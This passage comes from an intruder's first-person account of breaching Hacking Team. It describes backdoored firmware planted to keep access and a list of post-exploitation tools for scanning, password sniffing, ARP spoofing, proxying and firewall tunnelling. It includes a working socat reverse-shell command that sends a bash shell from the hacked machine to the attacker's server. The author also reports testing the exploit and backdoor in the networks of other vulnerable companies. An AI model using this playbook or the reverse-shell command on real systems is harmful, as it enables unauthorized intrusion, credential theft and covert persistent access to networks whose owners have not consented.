Be Prepared

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device. The backdoor serves to protect the exploit. Using the exploit just once and then returning through the backdoor makes it harder to identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

For all the standard Unix utilities that the system didn't have.

2) nmap

To scan and fingerprint Hacking Team's internal network.

3) Responder.py

The most useful tool for attacking windows networks when you have access to the internal network, but no domain user.

4) Python

To execute Responder.py

5) tcpdump

For sniffing traffic.

6) dsniff

For sniffing passwords from plaintext protocols like ftp, and for arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.

7) socat

For a comfortable shell with a pty: my_server: socat file:tty,raw,echo=0 tcp-listen:my_port hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ tcp:my_server:my_port

And useful for a lot more, it's a networking swiss army knife. See the examples section of its documentation.

8) screen

Like the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's network.

9) a SOCKS proxy server

To use with proxychains to be able to access their local network from any program.

10) tgcd

For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/ [2] https://nmap.org/ [3] https://github.com/SpiderLabs/Responder [4] https://github.com/bendmorris/static-python [5] http://www.tcpdump.org/ [6] http://www.monkey.org/~dugsong/dsniff/ [7] http://www.dest-unreach.org/socat/ [8] https://www.gnu.org/software/screen/ [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html [10] http://tgcd.sourceforge.net/

The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network.